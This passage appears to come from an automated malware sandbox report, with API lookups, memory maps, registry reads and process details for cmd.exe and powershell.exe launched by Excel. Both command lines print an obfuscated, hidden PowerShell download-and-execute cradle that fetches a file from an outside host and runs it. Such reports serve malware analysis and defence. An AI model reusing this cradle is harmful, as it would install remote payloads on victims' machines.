|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feff532640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feff5158a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feff515820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feff52af20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feff54a0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feff582160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feff515af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feff515a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feff515a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feff515a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feff4f60b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feff4f3e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feff549f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feff579b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feff579aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feff579990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feff579890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feff579770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feff55b8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feff55b800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feff5748e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feff579470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feff5796a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feff572fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feff579cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feff578ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feff579c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feff578e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feff573690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feff5792d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feff572e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feff573f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feff5791a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feff557c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feff557a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feff557890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feff557ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feff579600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feff5576a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feff5783f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feff523070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feff52d700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feff52d890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feff50caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feff518a00 |
|
1 | |
| Get Address | Unknown module name | function = CoCreateInstanceEx, address_out = 0x7fefe29de90 |
|
1 | |
| Get Address | Unknown module name | function = CLSIDFromProgIDEx, address_out = 0x7fefe2aa4c4 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee596f200 |
|
1 | |
| Get Address | Unknown module name | function = 600, address_out = 0x7fee5cec6fc |
|
3 | |
| Get Address | Unknown module name | function = 617, address_out = 0x7fee5d32490 |
|
3 | |
| Get Address | Unknown module name | function = 608, address_out = 0x7fee5d3142c |
|
3 | |
| Get Address | Unknown module name | function = 546, address_out = 0x7fee5d33da8 |
|
3 | |
| Get Address | Unknown module name | function = 601, address_out = 0x7fee5f6c3e0 |
|
3 | |
| Get Address | Unknown module name | function = 544, address_out = 0x7fee5d31bac |
|
3 | |
| Get Address | Unknown module name | function = 547, address_out = 0x7fee5d31c1c |
|
3 | |
| Get Address | Unknown module name | function = 619, address_out = 0x7fee5d32540 |
|
3 | |
| Get Address | Unknown module name | function = 594, address_out = 0x7fee5ee5210 |
|
3 | |
| Get Address | Unknown module name | function = 593, address_out = 0x7fee5ee5248 |
|
3 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (35)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 573, y_out = 559 |
|
2 | |
| Get Time | type = Local Time, time = 2018-02-27 09:03:37 (Local Time) |
|
4 | |
| Get Time | type = Local Time, time = 2018-02-27 09:03:38 (Local Time) |
|
23 | |
| Get Time | type = Ticks, time = 210632 |
|
2 | |
| Get Time | type = Ticks, time = 210648 |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: cmd.exe
52
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cMd /c"poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 25;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://formaversa.co/trq','%localappdata%.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') '%localappdata%.exe'"" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:16, Reason: Child Process |
| Unmonitor | End Time: 00:03:10, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb80 |
| Parent PID | 0xa2c (c:\program files\microsoft office\root\office16\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00156fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00270000 | 0x002d6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x005d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00760fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x01b6ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001b70000 | 0x01b70000 | 0x01eb2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01ec0000 | 0x0218efff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x4a540000 | 0x4a598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x774d0000 | 0x775c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x775d0000 | 0x776eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x776f0000 | 0x77898fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winbrand.dll | 0x7fef5800000 | 0x7fef5807fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefd830000 | 0x7fefd89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefda50000 | 0x7fefdb18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefdc50000 | 0x7fefdceefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefdd00000 | 0x7fefdd66fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefdd70000 | 0x7fefdd7dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7feff4c0000 | 0x7feff4edfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7feff8f0000 | 0x7feff9f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feffa10000 | 0x7feffa10fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xb98, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a540000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x775d0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cMd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x775e6d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x775e23d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x775d8290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x775e17e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-02-27 09:03:39 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 130416 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = localappdata, result_out = C:\Users\aETAdzjz\AppData\Local |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #3: powershell.exe
504
1
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | poweRSheLL -NoniNTeRACtivE -NoPr -exeCuTi ByPASS -WinDO hIDDen "do{sleep 25;(.(\"{2}{0}{1}\" -f'-o','bject','new') (\"{1}{3}{5}{0}{2}{4}\" -f't','syst','.webclie','em','nt','.ne')).('d'+'ow'+'nloadfil'+'e').Invoke('https://formaversa.co/trq','C:\Users\aETAdzjz\AppData\Local.exe')}while(!$?);&(\"{0}{2}{1}\"-f'star','ss','t-proce') 'C:\Users\aETAdzjz\AppData\Local.exe'" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:17, Reason: Child Process |
| Unmonitor | End Time: 00:03:10, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb98 |
| Parent PID | 0xb80 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B9C
0x
BA0
0x
BA4
0x
BA8
0x
BAC
0x
BB0
0x
86C
0x
74C
0x
8E4
0x
8D8
0x
900
0x
904
0x
AA4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
- |
| powershell.exe.mui | 0x00160000 | 0x00162fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x001f0000 | 0x001f3fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db | 0x00200000 | 0x00224fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x00240000 | 0x00243fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00250fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0035ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00770fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x01b7ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001b80000 | 0x01b80000 | 0x01c5efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c60000 | 0x01c60000 | 0x01c62fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01c7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01d7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db | 0x01d80000 | 0x01daffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001db0000 | 0x01db0000 | 0x01db0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001dc0000 | 0x01dc0000 | 0x01ddffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01deffff | Private Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x01df0000 | 0x01df2fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01e7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01e80000 | 0x01ee5fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01ef0fff | Private Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x01f00000 | 0x01f04fff | Memory Mapped File | Readable |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01f10000 | 0x01f17fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f9ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| sortdefault.nls | 0x01fa0000 | 0x0226efff | Memory Mapped File | Readable |
|
|
|
- |
| kernelbase.dll.mui | 0x02270000 | 0x0232ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002330000 | 0x02330000 | 0x02330fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002340000 | 0x02340000 | 0x02340fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002350000 | 0x02350000 | 0x0235ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x023effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000023f0000 | 0x023f0000 | 0x027e2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x0287ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortkey.nlp | 0x02880000 | 0x028c0fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x0295ffff | Private Memory | Readable, Writable |
|
|
|
- |
| mscorrc.dll | 0x02960000 | 0x029b3fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000029d0000 | 0x029d0000 | 0x02a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02b4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b50000 | 0x02b50000 | 0x02bcffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x1abcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001abd0000 | 0x1abd0000 | 0x1b29ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b2a0000 | 0x1b2a0000 | 0x1b3a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b3b0000 | 0x1b3b0000 | 0x1b4affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000001b4b0000 | 0x1b4b0000 | 0x1b4c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b500000 | 0x1b500000 | 0x1b57ffff | Private Memory | Readable, Writable |
|
|
|
- |
| system.management.automation.dll | 0x1b580000 | 0x1b861fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x75170000 | 0x75238fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x774d0000 | 0x775c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x775d0000 | 0x776eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x776f0000 | 0x77898fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x778c0000 | 0x778c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| powershell.exe | 0x13f480000 | 0x13f4f6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fee12d0000 | 0x7fee1464fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x7fee1470000 | 0x7fee15dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.xml.ni.dll | 0x7fee17e0000 | 0x7fee1e84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fee1e90000 | 0x7fee1fa7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fee1fb0000 | 0x7fee21c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee21d0000 | 0x7fee22b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee22c0000 | 0x7fee2369fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fee25f0000 | 0x7fee2621fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee2630000 | 0x7fee2698fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x7fee26a0000 | 0x7fee29cdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee29d0000 | 0x7fee352cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee3530000 | 0x7fee35e1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x7fee35f0000 | 0x7fee4012fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee4020000 | 0x7fee4efbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x7fee4f00000 | 0x7fee589cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fee77f0000 | 0x7fee7888fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fee7890000 | 0x7fee78fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
